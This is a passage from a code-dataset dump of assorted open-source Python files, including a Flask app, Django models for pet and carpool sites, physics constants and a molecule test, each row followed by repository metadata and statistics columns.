process_name = RootConfig().process_name
assert process_name
assert type(process_name) == str
assert len(process_name) > 3
# No format parameters in there, should have been formatted upon instantiation
assert "{" not in process_name
| 32.666667 | 94 | 0.783163 | 143 | 1,176 | 6.041958 | 0.314685 | 0.08912 | 0.101852 | 0.107639 | 0.315972 | 0.1875 | 0.1875 | 0.1875 | 0.1875 | 0.1875 | 0 | 0.002016 | 0.156463 | 1,176 | 35 | 95 | 33.6 | 0.868952 | 0.130102 | 0 | 0 | 0 | 0 | 0.062745 | 0 | 0 | 0 | 0 | 0 | 0.565217 | 1 | 0.173913 | false | 0 | 0.086957 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf7bb0df2ea5bd1508b28ac03700685986a30403 | 3,565 | py | Python | main.py | DataBiosphere/bond | 8459ea2f2a1f0b4e7c9c5e3c4e6361cf71e45ecd | [
"BSD-3-Clause"
] | 2 | 2018-05-29T14:32:55.000Z | 2020-01-16T18:42:14.000Z | main.py | DataBiosphere/bond | 8459ea2f2a1f0b4e7c9c5e3c4e6361cf71e45ecd | [
"BSD-3-Clause"
] | 45 | 2018-06-07T11:30:57.000Z | 2021-05-27T15:13:48.000Z | main.py | DataBiosphere/bond | 8459ea2f2a1f0b4e7c9c5e3c4e6361cf71e45ecd | [
"BSD-3-Clause"
] | 2 | 2018-05-31T20:14:06.000Z | 2020-03-06T01:29:19.000Z | import logging
import logging.config
import os
import flask
import google.cloud.logging
import yaml
from flask_cors import CORS
from google.auth.credentials import AnonymousCredentials
from google.cloud import ndb
from bond_app import routes
from bond_app.json_exception_handler import JsonExceptionHandler
from bond_app.swagger_ui import swaggerui_blueprint, SWAGGER_URL
client = None
if os.environ.get('DATASTORE_EMULATOR_HOST'):
# If we're running the datastore emulator, we should use anonymous credentials to connect to it.
# The project should match the project given to the Datastore Emulator. See tests/datastore_emulator/run_emulator.sh
client = ndb.Client(project="test", credentials=AnonymousCredentials())
else:
# Otherwise, create a client grabbing credentials normally from cloud environment variables.
client = ndb.Client()
def ndb_wsgi_middleware(wsgi_app):
"""Wrap an app so that each request gets its own NDB client context."""
def middleware(environ, start_response):
with client.context():
return wsgi_app(environ, start_response)
return middleware
def setup_logging():
"""
If we are running as a GAE application, we need to set up Stackdriver logging.
Stackdriver logging will encounter errors if it doesn't have access to the right project credentials.
Proceeds to load the custom logging configuration for the app.
:return:
"""
default_log_level = logging.DEBUG
if os.environ.get('GAE_APPLICATION'):
# Connects the logger to the root logging handler; by default this captures
# all logs at INFO level and higher
logging_client = google.cloud.logging.Client()
logging_client.setup_logging(log_level=default_log_level)
# Default logging config to be used if we fail reading from the file
logging_config = {"version": 1,
"disable_existing_loggers": False,
"root": {
"level": default_log_level
}
}
log_config_file_path = 'log_config.yaml'
try:
with open(log_config_file_path, 'rt') as f:
logging_config = yaml.safe_load(f.read())
logging.debug("Successfully read Logging Config from: {}".format(log_config_file_path))
except Exception:
# TODO: How do we determine what specific exception types to handle here?
logging.basicConfig(level=default_log_level)
logging.exception("Error trying to configure logging with file: {}. Using default settings."
.format(log_config_file_path))
logging.config.dictConfig(logging_config)
def create_app():
"""Initializes app."""
flask_app = flask.Flask(__name__)
flask_app.register_blueprint(routes.routes)
flask_app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)
CORS(flask_app)
return flask_app
# Logging setup/config should happen as early as possible so that we can log using our desired settings. If you want to
# log anything in this file, make sure you call `setup_logging()` first and then get the right logger as follows:
# logger = logging.getLogger(__name__)
setup_logging()
app = create_app()
app.wsgi_app = ndb_wsgi_middleware(app.wsgi_app) # Wrap the app in middleware.
handler = JsonExceptionHandler(app)
@app.after_request
def add_nosniff_content_type_header(response):
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "deny"
return response
| 37.135417 | 120 | 0.718373 | 473 | 3,565 | 5.238901 | 0.389006 | 0.036723 | 0.024213 | 0.027441 | 0.018563 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000355 | 0.208976 | 3,565 | 95 | 121 | 37.526316 | 0.878369 | 0.331276 | 0 | 0 | 0 | 0 | 0.111729 | 0.029538 | 0 | 0 | 0 | 0.010526 | 0 | 1 | 0.086207 | false | 0 | 0.206897 | 0 | 0.362069 | 0.051724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf8d1de3cc701ac9377ddd86ee131b8f80174c12 | 2,323 | py | Python | src/couplib/constants.py | DKosenkov/PyFREC | a578f649b1309f1e23412e3695cce2b9e48fda3d | [
"MIT"
] | null | null | null | src/couplib/constants.py | DKosenkov/PyFREC | a578f649b1309f1e23412e3695cce2b9e48fda3d | [
"MIT"
] | null | null | null | src/couplib/constants.py | DKosenkov/PyFREC | a578f649b1309f1e23412e3695cce2b9e48fda3d | [
"MIT"
] | null | null | null | import math
#-------------------------------------------------------------------------------
# Conversion factors
ATOB = 1.889725989 #Angstrom to Bohr Conversion
BTOA = 1.0/ATOB
HartreeToKCal = 627.509
HartreeToCM1 = 219474.629232
HartreeToeV = 27.211215
eVToHartree = 1/HartreeToeV
#eVToCM1_old = 8065.54429 #web
#eVToCM1 = 8065.54400479571 #our
TimeAuToS = 2.418884326505E-17 #Atomic unit of time to seconds
qe = 1.6021766208E-19 #Charge of an electron / coulombs
c = 299792458 #Speed of light / m/s
h = 6.626070040E-34 #Planck constant Jxs
eVToCM1 = qe/(100*h*c)
c_au = 137.035999139 #Speed of light 1/alpha = 1/(Fine-structure constant) in atomic units
Bohr_Radius_m = 5.2917721092E-11 # Bohr radiaus in meters
TDM_auToDebye = 2.541746 # (Transition) Dipole Moment atomic units (a.u. or ea0) to Debye
#1 Debye = 0.393430307 a.u.
#1 TDM a.u. = 2.541746 Debye
GAS_CONST_CM1_K = 0.69465783 #Gas constant in cm-1/K
#Quantum dynamics:
cm1_to_ps1_by_hbar1 = 2*1.0e2*math.pi*c*1.0e-12 #approximate value of the conversion factor: 0.19 (1 cm-1 = ps-1/h_bar)
cm1_to_ps1 = 1.0e2*c*1.0e-12 #approximate value of the conversion factor: 0.029 (1 cm-1 = 0.03 ps)
#Conversion of GROMACS GRO files in nm to ang
nm_to_ang = 10.0
#Conversion factor CM-1 = CM1_NM/nm; nm = CM1_NM/cm-1
CM1_NM = 1.0E7
AVOGADROS_Na = 6.0221415E23 #Avogadro's constant per mole
#-------------------------------------------------------------------------------
ELEMENTS_BY_ATOMIC_N = ['X','H','He',
'Li','Be','B','C','N','O','F','Ne',
'Na','Mg','Al','Si','P','S','Cl','Ar',
'K','Ca','Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn','Ga','Ge','As','Se','Br','Kr',
'Rb','Sr','Y','Zr','Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn','Sb','Te','I','Xe',
'Cs','Ba','La','Ce','Pr','Nd','Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb','Lu','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn',
'Fr','Ra','Ac','Th','Pa','U','Np','Pu','Am','Cm','Bk','Cf','Es','Fm','Md','No','Lr','Rf','Db','Sg','Bh','Hs','Mt','Ds','Rg','Cn','Uut','Fl','Uup','Lv','Uus','Uuo']
#-------------------------------------------------------------------------------
RE_FLOAT = r'[-]?\d+(?:.\d+)?|\.\d+' #Regular expression to match float numbers
RE_DOUBLE = r'[+\-]?(?:0|[1-9]\d*)(?:\.\d*)?(?:[eED][+\-]?\d+)?' | 47.408163 | 163 | 0.541541 | 378 | 2,323 | 3.259259 | 0.640212 | 0.012175 | 0.019481 | 0.00974 | 0.071429 | 0.071429 | 0.071429 | 0.071429 | 0.071429 | 0.071429 | 0 | 0.118133 | 0.114507 | 2,323 | 49 | 164 | 47.408163 | 0.480797 | 0.434783 | 0 | 0 | 0 | 0 | 0.231366 | 0.055124 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf91fd0e6ff5a588ad41746670409b50877da233 | 4,056 | py | Python | tests/test_molecule.py | zig1000/schem | 22883d345e6efbc6e2cc8c6b107a61f267b7b067 | [
"MIT"
] | null | null | null | tests/test_molecule.py | zig1000/schem | 22883d345e6efbc6e2cc8c6b107a61f267b7b067 | [
"MIT"
] | 1 | 2021-02-15T23:21:03.000Z | 2021-02-15T23:21:03.000Z | tests/test_molecule.py | zig1000/schem | 22883d345e6efbc6e2cc8c6b107a61f267b7b067 | [
"MIT"
] | 1 | 2021-02-15T22:48:38.000Z | 2021-02-15T22:48:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
import pickle
from timeit import Timer
import unittest
import sys
# Insert the parent directory to sys path so schem is accessible even if it's not available system-wide
sys.path.insert(1, str(Path(__file__).parent.parent))
from schem.molecule import Molecule
num_subtests = 0
LAST_TEST_RESULTS = {}
def percent_diff_str(last_metric, cur_metric):
'''Provide a % indicator, colored red or green if the given metric significantly changed.'''
percent_diff = (cur_metric - last_metric) / last_metric
percent_formatting = ''
if percent_diff <= -0.05:
percent_formatting = '\033[92m' # green
elif percent_diff >= 0.05:
percent_formatting = '\033[91m' # red
if percent_diff >= 0:
percent_formatting += '+'
format_end = '\033[0m'
return f'{percent_formatting}{percent_diff:.0%}{format_end}'
class TestMolecule(unittest.TestCase):
def test_isomorphism_valid(self):
'''Tests for molecules that should be valid isomorphisms of each other.'''
test_mol_pairs = (
("Wall of carbon",
"""Carbon;C;00611;10611;20611;30601;01611;12611;11611;21611;31601;32601;22611;02611;03611;13611;23611;33601;34601;24611;14611;04611;05611;15611;25611;35601;36601;26611;16611;06611;07610;17610;27610;37600""",
"Carbon;C;00611;10611;20611;30601;01611;12611;11611;21611;31601;32601;22611;02611;03611;13611;23611;33601;34601;24611;14611;04611;05611;15611;25611;35601;36601;26611;16611;06611;07610;17610;27610;37600"),
("Doping rotated",
"""Silicon;Si;001411;111511;101411;011411;201411;301401;211411;311401;021411;121411;221411;321401;031410;131410;231410;331400""",
"""Silicon;Si;001411;111411;101411;011411;201411;301401;211411;311401;021411;121411;221511;321401;031410;131410;231410;331400"""),
("Pyramid",
"Pyramid;C~01~06;12611;13611;14610;35601;32601;03610;34601;25610;36600;33601;22611;23611;24611;31601;30601;21611",
"Pyramid;C~01~06;33601;22611;23611;24611;31601;30601;21611;12611;13611;14610;35601;32601;03610;34601;25610;36600"),)
global num_subtests
for test_id, mol_A_str, mol_B_str in test_mol_pairs:
test_id = 'test_isomorphism_valid: ' + test_id
with self.subTest(msg=test_id):
num_subtests += 1
mol_A = Molecule.from_json_string(mol_A_str)
mol_B = Molecule.from_json_string(mol_B_str)
self.assertTrue(mol_A.isomorphic(mol_B), "Molecule.isomorphic() unexpectedly returned False")
# Check the time performance of the isomorphism algorithm
timer = Timer('mol_A.isomorphic(mol_B)', globals={'mol_A': mol_A, 'mol_B': mol_B})
if test_id not in LAST_TEST_RESULTS:
loops = max(max(timer.autorange()[0] for _ in range(2)) // 2, 5)
else:
loops = LAST_TEST_RESULTS[test_id]['loops']
min_time = min(timer.repeat(repeat=loops, number=1))
if test_id in LAST_TEST_RESULTS:
metrics_str = f"{min_time:.5f}s (b. of {loops}) ({percent_diff_str(LAST_TEST_RESULTS[test_id]['min_time'], min_time)})"
metrics_str += f" | {test_id}"
else:
metrics_str = f"{min_time:.5f}s (b. of {loops}) (NEW) | {test_id}"
print(metrics_str)
LAST_TEST_RESULTS[test_id] = {'loops': loops, 'min_time': min_time}
if __name__ == '__main__':
test_results_file = Path(__file__).parent / 'last_performance_results.pickle'
if test_results_file.exists():
with test_results_file.open('rb') as f:
LAST_TEST_RESULTS = pickle.load(f)
unittest.main(verbosity=0, exit=False)
print(f"Ran {num_subtests} subtests")
# If successful, write the current times/mem usage to file
with test_results_file.open('wb') as f:
pickle.dump(LAST_TEST_RESULTS, f)
| 44.086957 | 220 | 0.655325 | 556 | 4,056 | 4.564748 | 0.363309 | 0.052009 | 0.047281 | 0.022459 | 0.396375 | 0.313239 | 0.282112 | 0.227738 | 0.189913 | 0.154452 | 0 | 0.225806 | 0.220414 | 4,056 | 91 | 221 | 44.571429 | 0.57685 | 0.10429 | 0 | 0.032258 | 0 | 0.064516 | 0.281547 | 0.199112 | 0 | 0 | 0 | 0 | 0.016129 | 1 | 0.032258 | false | 0 | 0.096774 | 0 | 0.16129 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf94d09f1a74c7a79cfafcb370c14a7e527ca36f | 654 | py | Python | Discussion/migrations/0003_auto_20180906_1441.py | Arianxx/ShareForum | b3bf6a3b2ace869cb88a0b41bbbd4575b6cdfd28 | [
"MIT"
] | 39 | 2018-09-08T04:40:59.000Z | 2021-09-10T02:02:04.000Z | Discussion/migrations/0003_auto_20180906_1441.py | STARCASTPOD/BookForum | b3bf6a3b2ace869cb88a0b41bbbd4575b6cdfd28 | [
"MIT"
] | null | null | null | Discussion/migrations/0003_auto_20180906_1441.py | STARCASTPOD/BookForum | b3bf6a3b2ace869cb88a0b41bbbd4575b6cdfd28 | [
"MIT"
] | 8 | 2018-09-08T08:50:45.000Z | 2020-03-13T15:38:56.000Z | # Generated by Django 2.0.5 on 2018-09-06 06:41
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Discussion', '0002_auto_20180613_1819'),
]
operations = [
migrations.RemoveField(
model_name='discussreply',
name='reply_to',
),
migrations.AddField(
model_name='discussreply',
name='reply_to',
field=models.ManyToManyField(related_name='replys_from', to=settings.AUTH_USER_MODEL),
),
]
| 26.16 | 98 | 0.639144 | 69 | 654 | 5.855072 | 0.608696 | 0.049505 | 0.079208 | 0.10396 | 0.158416 | 0.158416 | 0 | 0 | 0 | 0 | 0 | 0.063918 | 0.25841 | 654 | 24 | 99 | 27.25 | 0.769072 | 0.068807 | 0 | 0.333333 | 1 | 0 | 0.138386 | 0.037891 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf95e8ba45ff95f24183b488e1c746015e0ff293 | 1,879 | py | Python | ambry/cli/test.py | kball/ambry | ae865245128b92693d654fbdbb3efc9ef29e9745 | [
"BSD-2-Clause"
] | 1 | 2017-06-14T13:40:57.000Z | 2017-06-14T13:40:57.000Z | ambry/cli/test.py | kball/ambry | ae865245128b92693d654fbdbb3efc9ef29e9745 | [
"BSD-2-Clause"
] | null | null | null | ambry/cli/test.py | kball/ambry | ae865245128b92693d654fbdbb3efc9ef29e9745 | [
"BSD-2-Clause"
] | null | null | null | """
Copyright (c) 2013 Clarinova. This file is licensed under the terms of the
Revised BSD License, included in this distribution as LICENSE.txt
"""
from ..cli import prt,fatal
def test_parser(cmd):
import argparse
test_p = cmd.add_parser('test', help='Test and debugging')
test_p.set_defaults(command='test')
asp = test_p.add_subparsers(title='Test commands', help='command help')
sp = asp.add_parser('config', help='Dump the configuration')
sp.set_defaults(subcommand='config')
sp.add_argument('-v', '--version', default=False, action='store_true', help='Display module version')
sp = asp.add_parser('spatialite', help='Test spatialite configuration')
sp.set_defaults(subcommand='spatialite')
sp = asp.add_parser('gitaccess', help='Test gitaccess')
sp.set_defaults(subcommand='gitaccess')
def test_command(args, rc):
from ..library import new_library
globals()['test_' + args.subcommand](args, rc)
def test_spatialite(args,rc):
from pysqlite2 import dbapi2 as db
import os
f = '/tmp/_db_spatialite_test.db'
if os.path.exists(f):
os.remove(f)
conn = db.connect(f)
conn.execute('select spatialite_version()')
cur = conn.cursor()
try:
conn.enable_load_extension(True)
conn.execute("select load_extension('/usr/lib/libspatialite.so')")
#loaded_extension = True
except AttributeError:
#loaded_extension = False
prt("WARNING: Could not enable load_extension(). ")
rs = cur.execute('SELECT sqlite_version(), spatialite_version()')
for row in rs:
msg = "> SQLite v%s Spatialite v%s" % (row[0], row[1])
print(msg)
def test_gitaccess(args,rc):
from ..source.repository import new_repository
repo = new_repository(rc.sourcerepo('default'))
for e in repo.service.list():
print e
| 25.053333 | 105 | 0.674827 | 251 | 1,879 | 4.916335 | 0.438247 | 0.02269 | 0.019449 | 0.034036 | 0.058347 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005302 | 0.196913 | 1,879 | 74 | 106 | 25.391892 | 0.812459 | 0.025013 | 0 | 0 | 0 | 0 | 0.262656 | 0.041691 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.051282 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfa262fe8a13bcb8142e0bf9665a364d87fdf705 | 752 | py | Python | core/models.py | GuiSilva11/sospet | f29a8cd3f06a955974292025e9ba1272e84a385a | [
"MIT"
] | null | null | null | core/models.py | GuiSilva11/sospet | f29a8cd3f06a955974292025e9ba1272e84a385a | [
"MIT"
] | null | null | null | core/models.py | GuiSilva11/sospet | f29a8cd3f06a955974292025e9ba1272e84a385a | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django import dj_database_url
# Create your models here.
class Pet(models.Model):
city = models.CharField(max_length=100)
description = models.TextField()
phone = models.CharField(max_length=11, null=True)
email = models.EmailField(null=True, blank=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
end_date = models.DateTimeField(null=True, blank=True)
begin_date = models.DateTimeField(auto_now_add=True)
active = models.BooleanField(default=True)
photo = models.ImageField(upload_to='pet', blank=True, null=True)
def __str__(self):
return str(self.id)
class Meta:
db_table = 'pet_lost' | 32.695652 | 69 | 0.719415 | 102 | 752 | 5.147059 | 0.558824 | 0.060952 | 0.068571 | 0.091429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008078 | 0.176862 | 752 | 23 | 70 | 32.695652 | 0.840065 | 0.031915 | 0 | 0 | 0 | 0 | 0.015131 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.176471 | 0.058824 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bfa263056c348a6c1f4150ad9b38871d4c77f498 | 422 | py | Python | 8KYU/first_non_consecutive.py | yaznasivasai/python_codewars | 25493591dde4649dc9c1ec3bece8191a3bed6818 | [
"MIT"
] | 4 | 2021-07-17T22:48:03.000Z | 2022-03-25T14:10:58.000Z | 8KYU/first_non_consecutive.py | yaznasivasai/python_codewars | 25493591dde4649dc9c1ec3bece8191a3bed6818 | [
"MIT"
] | null | null | null | 8KYU/first_non_consecutive.py | yaznasivasai/python_codewars | 25493591dde4649dc9c1ec3bece8191a3bed6818 | [
"MIT"
] | 3 | 2021-06-14T14:18:16.000Z | 2022-03-16T06:02:02.000Z | def first_non_consecutive(arr: list) -> int:
''' This function returns the first element of an array that is not consecutive. '''
if len(arr) < 2:
return None
non_consecutive = []
for i in range(len(arr) - 1):
if arr[i+1] - arr[i] != 1:
non_consecutive.append(arr[i+1])
if len(non_consecutive) == 0:
return None
return int(''.join(map(str, non_consecutive[:1]))) | 38.363636 | 88 | 0.599526 | 63 | 422 | 3.920635 | 0.52381 | 0.283401 | 0.060729 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022436 | 0.260664 | 422 | 11 | 89 | 38.363636 | 0.769231 | 0.180095 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfa7843bcdb86b3f94012b1ea1de6ffb043c292c | 1,692 | py | Python | bitey/cpu/pin.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | bitey/cpu/pin.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | bitey/cpu/pin.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from enum import Enum
class State(Enum):
"State of a pin, can either be LOW or HIGH"
LOW = 1
HIGH = 2
@dataclass
class Pin:
"""
Physical pins on the microprocessor.
Most of the code in this project is higher-level, ignoring
things like clock-cycles and physical structure of the address
and data bus.
The Pin and Pins classes provide some exceptions to this general rule.
In particular, the reset pin provides a safe start to the initialization
of the processor.
"""
name: str = ""
"Name of the pin"
short_name: str = ""
"Short name of the pin"
state: State = State.LOW
"""
State of the pin, low or high
Default to low, so the processor is in reset mode.
Some other pins may need to be broght high to be in a normal state,
such as the IRQ pin.
"""
def set_high(self):
self.state = State.HIGH
def set_low(self):
self.state = State.LOW
def get(self):
return self.state
@dataclass
class RST(Pin):
"""
The reset pin
When the reset pin is low, the processor is in an uninitialized state.
"""
class IRQ(Pin):
"""
The IRQ pin
When the IRQ line is low, an interrupt has been requested.
Multiple lines may be connected to this pin.
"""
@dataclass
class Pins:
"""
The set of pins on the CPU
"""
pins: list[Pin]
def __post_init__(self):
"Create a dictionary so we can access pins by short name"
self.pin_dict = {}
for f in self.pins:
self.pin_dict[f.short_name] = f
def __getitem__(self, i):
return self.pin_dict[i]
| 20.888889 | 76 | 0.630615 | 258 | 1,692 | 4.073643 | 0.387597 | 0.028544 | 0.031399 | 0.022835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001679 | 0.296099 | 1,692 | 80 | 77 | 21.15 | 0.880772 | 0.391253 | 0 | 0.09375 | 0 | 0 | 0.158273 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15625 | false | 0 | 0.0625 | 0.0625 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bfa97c289b0736c98a1200a9e4a73734a8953802 | 276 | py | Python | sme_uniforme_apps/custom_user/urls.py | prefeiturasp/SME-PortalUniforme-BackEnd | d7e15dd3b9c7b9cfb621e53ec81d40f18c1fab3f | [
"MIT"
] | null | null | null | sme_uniforme_apps/custom_user/urls.py | prefeiturasp/SME-PortalUniforme-BackEnd | d7e15dd3b9c7b9cfb621e53ec81d40f18c1fab3f | [
"MIT"
] | null | null | null | sme_uniforme_apps/custom_user/urls.py | prefeiturasp/SME-PortalUniforme-BackEnd | d7e15dd3b9c7b9cfb621e53ec81d40f18c1fab3f | [
"MIT"
] | 1 | 2020-02-01T12:10:42.000Z | 2020-02-01T12:10:42.000Z | from django.urls import include, path
from rest_framework import routers
from .api.viewsets.usuario_viewset import UsuarioViewset
router = routers.DefaultRouter()
router.register("usuarios", UsuarioViewset, "Usuários")
urlpatterns = [
path('', include(router.urls))
]
| 21.230769 | 56 | 0.775362 | 31 | 276 | 6.83871 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119565 | 276 | 12 | 57 | 23 | 0.872428 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bfa9e9e64bf356bd1cacc359a0d51be50f947a91 | 2,837 | py | Python | Driver/models.py | Anne56njeri/Carpool | b1d95b1307c287a8edca576ad24ccc3b7a8427fc | [
"Unlicense",
"MIT"
] | 1 | 2018-08-01T08:57:44.000Z | 2018-08-01T08:57:44.000Z | Driver/models.py | Anne56njeri/Carpool | b1d95b1307c287a8edca576ad24ccc3b7a8427fc | [
"Unlicense",
"MIT"
] | null | null | null | Driver/models.py | Anne56njeri/Carpool | b1d95b1307c287a8edca576ad24ccc3b7a8427fc | [
"Unlicense",
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
'''
we create a profile class that will help us save information on whether the user is a
a user or a driver
'''
class Profile(models.Model):
username=models.CharField(max_length=40)
profile_image=models.ImageField(upload_to='profiles/')
choices=(('Male','Male'),('Female','Female'))
sex=models.CharField(_('sex'),max_length=30,blank=True,choices=choices)
user_choices=(('Driver','Driver'),('Passenger','Passenger'))
user_type=models.CharField(_('user type'),max_length=30,blank=True,choices=user_choices)
user=models.OneToOneField(User,on_delete=models.CASCADE)
def __str__(self):
return self.username
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
def delete_profile(self):
self.delete()
'''
we create a car model to save information about the car as users may have prefrences
'''
class Venue(models.Model):
name=models.CharField(max_length=255)
latitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
longitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
user=models.ForeignKey(Profile,null=True)
def __str__(self):
return self.name
def delete_venue(self):
self.save()
@classmethod
def search (cls,search_term):
locations=cls.objects.filter(name__icontains=search_term)
return locations
class Car(models.Model):
car_brand=models.CharField(max_length=30)
Number_plate=models.CharField(max_length=40)
seats_available=models.IntegerField()
users_car=models.ForeignKey(User,null=True)
location=models.ForeignKey(Venue,null=True)
def __str__(self):
return self.car_brand
'''
we create a driver model to save information of the driver and the car
'''
'''
we add the car foreign key to the driver model to save that the car belongs to the specific user and also query the db is easier
'''
class Driver(models.Model):
start=models.CharField(max_length=40)
destination=models.CharField(max_length=30)
user=models.ForeignKey(Profile,null=True)
car=models.ForeignKey(Car,null=True)
class Passenger(models.Model):
name=models.CharField(max_length=40)
national_id=models.CharField(max_length=40)
Reviews=models.CharField(max_length=40,blank=True)
where_are_you=models.ForeignKey(Venue,null=True)
user=models.ForeignKey(Profile,null=True)
Phone_number=models.CharField(max_length=40,null=True)
| 38.337838 | 128 | 0.739161 | 400 | 2,837 | 5.1 | 0.305 | 0.088235 | 0.088235 | 0.117647 | 0.334804 | 0.19951 | 0.155882 | 0.057843 | 0.057843 | 0.057843 | 0 | 0.012023 | 0.149806 | 2,837 | 73 | 129 | 38.863014 | 0.833748 | 0.00846 | 0 | 0.109091 | 0 | 0 | 0.02967 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127273 | false | 0.036364 | 0.090909 | 0.054545 | 0.854545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bfaa06301e4f72dec47a85b72806305bb7f8be9a | 375 | py | Python | taskmanager/src/modules/events/infrastructure/persistence/models/event_model.py | alice-biometrics/petisco-task-manager | 2bad52013ab122f8c3e5dce740dcd154883e6940 | [
"MIT"
